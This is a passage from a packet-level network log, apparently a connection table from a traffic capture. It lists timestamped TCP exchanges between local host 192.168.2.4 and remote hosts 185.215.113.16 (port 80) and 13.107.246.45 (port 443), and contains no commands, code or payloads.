                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.643769979 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.643773079 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.643790007 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.643795967 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.643801928 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.643819094 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.643846035 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.643877029 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.643887997 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.643898010 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.643920898 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.643933058 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.643954039 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.643965006 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.643974066 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.643986940 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.643989086 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.644010067 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.644040108 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.644058943 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.644071102 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.644081116 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.644093037 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.644104004 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.644110918 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.644114971 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.644136906 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.644140959 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.644144058 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.644156933 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.644167900 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.644180059 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.644186020 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.644201994 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.644205093 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.644217014 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.644229889 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.644229889 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.644248009 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.644253016 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.644260883 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.644270897 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.644284010 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.644298077 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.644309044 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.644347906 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.644387007 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.644531012 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.644541979 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.644552946 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.644571066 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.644593000 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.644656897 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.644666910 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.644678116 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.644690037 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.644701958 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.644702911 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.644709110 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.644712925 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.644725084 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.644731998 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.644768953 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.644793987 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.644916058 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.644926071 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.644938946 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.644948959 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.644954920 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.644958973 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.644968033 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.644979954 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.644990921 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.644993067 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.644999027 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.645004034 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.645009995 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.645015001 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.645030022 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.645064116 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.685733080 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.685743093 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.685753107 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.685762882 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.685806990 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.685842991 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.700349092 CET4436383213.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.700490952 CET4436383213.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.700602055 CET63832443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.701638937 CET4436383113.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.701706886 CET4436383113.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.701781988 CET63831443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.712374926 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.712450027 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.712466955 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.712485075 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.712495089 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.712505102 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.712512016 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.712552071 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.712735891 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.712748051 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.712758064 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.712789059 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.712815046 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.712826967 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.712845087 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.712853909 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.712853909 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.712869883 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.712882042 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.712889910 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.712902069 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.712908030 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.712913990 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.712918043 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.712937117 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.712943077 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.712949038 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.712960958 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.712966919 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.712973118 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.712977886 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.712985039 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.713004112 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.713022947 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.713341951 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.713352919 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.713363886 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.713386059 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.713386059 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.713399887 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.713407040 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.713409901 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.713432074 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.713454962 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.713578939 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.713673115 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.713674068 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.713684082 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.713716984 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.713723898 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.713730097 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.713742018 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.713752985 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.713763952 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.713777065 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.713803053 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.713984013 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.713995934 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.714005947 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.714026928 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.714041948 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.714051962 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.714062929 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.714082956 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.714107037 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.714267969 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.714288950 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.714298010 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.714309931 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.714334011 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.714396954 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.714409113 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.714418888 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.714442015 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.714456081 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.714684010 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.714721918 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.714721918 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.714732885 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.714756012 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.714768887 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.714782953 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.714793921 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.714803934 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.714826107 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.714843988 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.715766907 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.715779066 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.715790987 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.715801954 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.715812922 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.715815067 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.715836048 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.715854883 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.727031946 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.727077961 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.727088928 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.727109909 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.727130890 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.727132082 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.727144003 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.727155924 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.727164984 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.727169037 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.727190971 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.727221012 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.727225065 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.727237940 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.727248907 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.727261066 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.727269888 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.727276087 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.727288008 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.727303982 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.727320910 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.727328062 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.727356911 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.727358103 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.727369070 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.727380037 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.727397919 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.727410078 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.727416039 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.727421045 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.727432966 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.727436066 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.727446079 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.727446079 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.727452993 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.727463007 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.727473021 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.727474928 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.727488041 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.727499008 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.727500916 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.727530003 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.727540016 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.727543116 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.727555037 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.727566957 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.727580070 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.727585077 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.727592945 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.727602005 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.727626085 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.727648973 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.727674961 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.727686882 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.727704048 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.727715015 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.727715969 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.727727890 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.727727890 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.727741003 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.727752924 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.727754116 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.727765083 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.727776051 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.727780104 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.727796078 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.727801085 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.727813005 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.727819920 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.727823973 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.727835894 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.727839947 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.727873087 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.733668089 CET4436383313.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.733722925 CET4436383313.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.733779907 CET63833443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.737817049 CET63833443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.737833977 CET4436383313.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.737844944 CET63833443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.737849951 CET4436383313.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.760910034 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.760958910 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.760967970 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.760976076 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.760982990 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.760987997 CET8063819185.215.113.16192.168.2.4
